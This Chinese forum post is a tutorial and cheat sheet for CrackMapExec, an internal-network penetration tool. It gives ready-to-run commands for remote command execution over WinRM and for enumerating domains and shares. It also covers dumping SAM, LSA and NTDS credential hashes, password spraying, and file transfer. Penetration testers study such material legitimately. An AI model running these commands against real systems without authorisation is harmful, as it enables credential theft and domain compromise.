CrackMapExec内网渗透工具：功能与用法详解-山海云端论坛

CrackMapExec（简称CME）是一款用于内网域渗透的强大工具，可用于信息收集和漏洞探测。以下是其主要功能和使用示例：

1. 使用WinRM执行命令 通过WinRM执行命令可绕过部分杀软拦截：

<code>crackmapexec winrm 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'</code>

2. SMB协议常用枚举功能

枚举域组：

<code>crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups</code>

枚举不需要SMB签名的主机：

<code>crackmapexec smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt</code>

枚举主机上的杀软：

<code>crackmapexec smb <ip> -u user -p pass -M enum_av</code>

列出共享：

<code>crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --shares</code>

枚举有效sessions：

<code>crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --sessions</code>

列出磁盘：

<code>crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --disks</code>

枚举登录用户：

<code>crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --loggedon-users</code>

枚举域用户：

<code>crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --users</code>

通过爆破RID枚举用户：

<code>crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --rid-brute</code>

获取域密码策略：

<code>crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --pass-pol</code>

验证本地用户，并测试登录：

<code>crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth</code>

3. 获取凭证Hash 可使用–sam、–lsa参数：

<code>crackmapexec winrm 192.168.216.144 -u 'administrator' -p 'pass1234!' --sam/--lsa</code>

4. 导出域NTDS

<code>crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' --ntds</code>

5. 密码喷洒

<code>crackmapexec smb 192.168.1.101 -u user1 user2 user3 -p Summer18 crackmapexec smb 192.168.1.101 -u /path/to/users.txt -p Summer18 crackmapexec smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt</code>

6. 文件上传下载

<code>crackmapexec smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt crackmapexec smb 172.16.251.152 -u user -p pass --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt</code>

7. 检测服务

<code>crackmapexec smb <ip> -u 'user' -p 'pass' -M spooler crackmapexec smb <ip> -u 'user' -p 'pass' -M webdav</code>

8. 其他功能 包括ASREPRoast、查找非约束委派账户、检测ESC8（adcs）漏洞利用、收集子网段信息、查看具有DCsync权限用户、收集BloodHound信息、通过RDP协议屏幕截图、扫描zerologo、petitpotam、nopac漏洞。

这些功能使得CrackMapExec成为内网渗透测试中的强大利器。

版权声明 1 本网站名称：山海云端-专注于PHP与网络安全
2 本站永久网址：www.shserve.cn
3 本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长 QQ1790643379进行删除处理。
4 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6 本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END

CrackMapExec内网渗透工具：功能与用法详解

请登录后发表评论